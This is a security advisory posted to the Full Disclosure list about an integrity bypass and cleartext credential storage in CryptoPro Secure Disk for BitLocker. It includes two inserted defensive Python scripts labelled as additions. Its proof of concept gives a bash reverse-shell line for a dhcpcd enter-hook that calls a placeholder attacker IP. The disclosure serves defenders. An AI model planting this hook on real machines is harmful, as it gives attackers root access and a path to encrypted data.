SEC Consult SA-20260224-0 :: Multiple vulnerabilities in CPSD CryptoPro Secure Disk for BitLocker (CVE-2025-10010)


Full Disclosure mailing list archives


From: SEC Consult Vulnerability Lab via Fulldisclosure <fulldisclosure () seclists org>
Date: Tue, 24 Feb 2026 13:56:42 +0000

SEC Consult Vulnerability Lab Security Advisory < 20260224-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: CPSD CryptoPro Secure Disk for BitLocker
 vulnerable version: 7.6.4.16432 (76212)
      fixed version: 7.6.6 / 7.7.1
         CVE number: CVE-2025-10010
             impact: high
           homepage: https://www.cpsd.at
              found: 2025-04-14
                 by: Gorazd Jank (Office Vienna)
                     Stefan Viehböck
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Atos business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
(translated from German)
"The CPSD team develops high-quality encryption solutions for
security-conscious companies. For over 15 years, the CryptoPro products have
stood for the best customer satisfaction through a balanced mix of security,
user convenience and minimal administration.

Your security requirements are in the best hands with our experts. We are
happy to share the experience gained from numerous cryptography projects and
recommend the optimal encryption strategy. Let the advantages inspire you!"

Source: https://www.cpsd.at/


Business recommendation:
------------------------
The vendor provides patches (7.6.6/7.7.1) for the affected software which
should be installed immediately if the devices are not already patched.

In cases where patching is not feasible it is possible to encrypt the PBA
partition to prevent changes. For detailed information see chapter
Workaround below.

SEC Consult highly recommends performing a thorough security review of the
product, conducted by security professionals, to identify and resolve
potential further security issues.


Vulnerability overview/description:
-----------------------------------
1) Integrity Validation Bypass (CVE-2025-10010)
The CryptoPro Secure Disk application boots a small Linux operating system
to perform user authentication before using BitLocker to decrypt the Windows
partition. The system is located on a separate unencrypted partition which can
be reached by anyone with access to the hard disk.

Multiple checks are performed to validate the integrity of the Linux operating
system and the CryptoPro Secure Disk application files; when files have been
changed, an error is shown on system start. One of these checks is the Linux
kernel's Integrity Measurement Architecture (IMA). It was identified that
configuration files are not validated by the IMA and can therefore be changed
unless another measure covers them. This allows an attacker to execute
arbitrary code in the context of the root user, e.g., to plant a backdoor and
access data while the system is running.

2) Cleartext storage of sensitive data
CryptoPro Secure Disk allows users who have forgotten their credentials to
contact offline as well as online support. The online version needs to
establish a connection to the support server. For this purpose, it may connect
to a predefined LAN or WLAN.

If secrets (e.g., certificates, passwords, etc.) are needed to access these
networks the corresponding configurations and files are stored in the /tmp
folder in clear text. An attacker with access to the Linux operating system can
read the secrets and use them to potentially connect to an internal network.


Proof of concept:
-----------------
1) Integrity Validation Bypass (CVE-2025-10010)
An attacker can access the unencrypted partition on the hard disk by either
booting from an external medium (e.g., USB) or by removing the hard disk and
mounting it to another system. No authentication is needed.

To bypass the IMA and gain arbitrary code execution, an editable configuration
file is needed that supports the execution of code and is processed by the
system. A service meeting these preconditions is the Dynamic Host
Configuration Protocol Daemon (dhcpd). It supports enter and exit hooks, which
are bash scripts executed when the dhcpd service is started or exited,
respectively. They are called after the Linux operating system has been
initialized.

The vulnerability can be exploited by setting up a DHCP enter hook with a
reverse shell. This can be done by creating the file /etc/dhcpcd.enter-hook
with the following content:

------------------------------------------------------------------------------
#!/bin/bash

bash -c 'exec bash -i &>/dev/tcp/192.168.XXX.XXX/9999 <&1' &
------------------------------------------------------------------------------

The host and the receiver of the reverse shell must be connected to each
other, e.g., via a router. After the host machine restarts, a connection is
opened to the attacker's host, resulting in a reverse shell with root
privileges.
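A defender-side counterpart to the issue above, added here as an example and not part of the advisory or of the vendor's product: an offline integrity audit of a PBA partition mounted read-only, diffed against a baseline SHA-256 manifest in `sha256sum` format taken from a known-good installation (mount point, manifest file and its format are assumptions), which also flags the dhcpcd hook files the advisory says IMA does not validate.

```python
# Added example, not CPSD's tooling: offline integrity audit of a PBA partition
# mounted read-only, against a baseline manifest from a known-good install.
import hashlib
import os
import sys

# Scripts dhcpcd runs as root at boot; per the advisory IMA does not validate them.
HOOK_PATHS = ("etc/dhcpcd.enter-hook", "etc/dhcpcd.exit-hook")

def sha256_file(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def build_manifest(root):
    """Map every regular file below root (symlinks skipped) to its SHA-256."""
    manifest = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            if os.path.isfile(full) and not os.path.islink(full):
                manifest[os.path.relpath(full, root)] = sha256_file(full)
    return manifest

def load_manifest(path):
    """Parse sha256sum output ("<hex>  <path>"), tolerating the ' *' marker."""
    manifest = {}
    with open(path, encoding="utf-8") as fh:
        for line in fh:
            digest, _, rel = line.strip().partition(" ")
            if digest and rel:
                manifest[rel.lstrip(" *")] = digest
    return manifest

def compare_manifests(baseline, current):
    """Diff two {relative path: hex digest} maps into added/modified/removed."""
    return {
        "added": sorted(p for p in current if p not in baseline),
        "modified": sorted(p for p, h in baseline.items()
                           if p in current and current[p] != h),
        "removed": sorted(p for p in baseline if p not in current),
    }

def unmeasured_hooks(manifest):
    """Hook scripts present on the partition that IMA would not appraise."""
    return sorted(p for p in HOOK_PATHS if p in manifest)

if __name__ == "__main__":  # usage: audit.py <mounted PBA root> <baseline file>
    current = build_manifest(sys.argv[1])
    findings = compare_manifests(load_manifest(sys.argv[2]), current)
    findings["hooks"] = unmeasured_hooks(current)
    print("\n".join(f"{k}: {p}" for k, ps in findings.items() for p in ps))
    sys.exit(1 if any(findings.values()) else 0)
```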


2) Cleartext storage of sensitive data
To exploit this vulnerability, access to the running CryptoPro Secure system is
needed, e.g., through a reverse shell. When the online support is used, the
credentials for the network are stored in clear text in the /tmp folder.
Accessing it after the application has started, without user interaction, is
sufficient to obtain this information.

The figure below shows the certificates as well as the configuration containing
their clear text credentials: the user certificate (host.pem) and the user's
private key (priv.pem), whose clear text password can be found inside the
"wlan_supplicant_conf.wlan0" file. There is also a tls_certs.pfx file with a
clear text password of unknown purpose. This would allow an attacker to access
the user's WLAN and/or bypass 802.1X protection.

<issue2_poc_cleartext_storage_01.png>
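A detection check for this second issue, added here as an example and not part of the advisory or of the product: it scans a directory (e.g. a copy of the PBA system's /tmp) for the kinds of cleartext secrets described, namely wpa_supplicant password fields, unencrypted PEM private keys and PKCS#12 bundles. The sample configuration is constructed; only the filenames come from the advisory.

```python
# Added example, not CPSD's tooling: scan a directory (e.g. a copy of the
# PBA system's /tmp) for the kinds of cleartext secrets the advisory describes.
import os
import re

# wpa_supplicant network-block keys whose values are secrets stored in clear text.
SECRET_KEY_RE = re.compile(r"^[ \t]*(psk|password|private_key_passwd)[ \t]*=", re.M)
PEM_KEY_RE = re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----")
PEM_ENCRYPTED_RE = re.compile(r"Proc-Type: 4,ENCRYPTED|BEGIN ENCRYPTED PRIVATE KEY")
PKCS12_SUFFIXES = (".pfx", ".p12")

def scan_content(name, data):
    """Return finding strings for one file; secret values are never echoed."""
    text = data.decode("utf-8", "replace")
    findings = [f"{name}: cleartext {m.group(1)}"
                for m in SECRET_KEY_RE.finditer(text)]
    if PEM_KEY_RE.search(text) and not PEM_ENCRYPTED_RE.search(text):
        findings.append(f"{name}: unencrypted PEM private key")
    if name.lower().endswith(PKCS12_SUFFIXES):
        findings.append(f"{name}: PKCS#12 bundle, check for a stored password nearby")
    return findings

def scan_dir(root, max_bytes=1 << 20):
    """Walk root and collect findings; unreadable files are skipped."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue
            findings.extend(scan_content(os.path.relpath(path, root), data))
    return sorted(findings)

# Constructed sample resembling an EAP-TLS network block as wpa_supplicant
# reads it; the filenames match those in the advisory, the values are made up.
SAMPLE_CONF = b"""network={
    ssid="corp-wlan"
    key_mgmt=WPA-EAP
    eap=TLS
    identity="pba-client"
    client_cert="/tmp/host.pem"
    private_key="/tmp/priv.pem"
    private_key_passwd="made-up-secret"
}
"""
```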


Vulnerable / tested versions:
-----------------------------
The following version was tested; it was the latest version available at the
time of the test:
* 7.6.4.16432 (76212)


Vendor contact timeline:
------------------------
2025-06-04: Contacting vendor through support () cpsd at
2025-06-04: Quick vendor response with request for information.
2025-06-10: Submission of advisory via secure platform.
2025-06-24: Response from vendor with workaround. Vendor-Clients will be informed
            and final fix will be released with version 7.6.6 / 7.7.1.
2025-06-27: Following up regarding the fix proposed by the vendor regarding
            checksums.
2025-07-25: Information to vendor about start of advisory publication, sending
            current advisory draft to vendor.
2025-08-05: Vendor proposes adding the workaround to the business recommendation
            section.
2025-09-06: Asking the vendor when the patches have been provided to the customers.
2025-09-08: Reserving CVE-2025-10010. Vendor is still clarifying status with
            customers, requests delay of publication for a few months.
            Patch information was provided to customers on 12th August.
2026-02-19: Informing vendor about upcoming advisory release.
2026-02-24: Public release of security advisory.


Solution:
---------
The vendor provides a patch with version 7.6.6 / 7.7.1.
Encryption is activated by default starting with version 7.7.


Workaround:
-----------
Encryption of the PBA partition is possible (since version 7.6.0) and
prevents the file changes described in this advisory. Encryption can be
activated via "Client Security/Verschiedenes/PBA Linux Partition
verschlüsseln". Clients will be informed by the vendor about the risk if
the PBA partition is not encrypted.


Advisory URL:
-------------
https://sec-consult.com/vulnerability-lab/


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos business. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers.
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application: https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices: https://sec-consult.com/contact/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: https://blog.sec-consult.com
X: https://x.com/sec_consult

EOF Gorazd Jank / @2026

Attachment: smime.p7s
Description: S/MIME Cryptographic Signature

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Article source: https://seclists.org/fulldisclosure/2026/Mar/0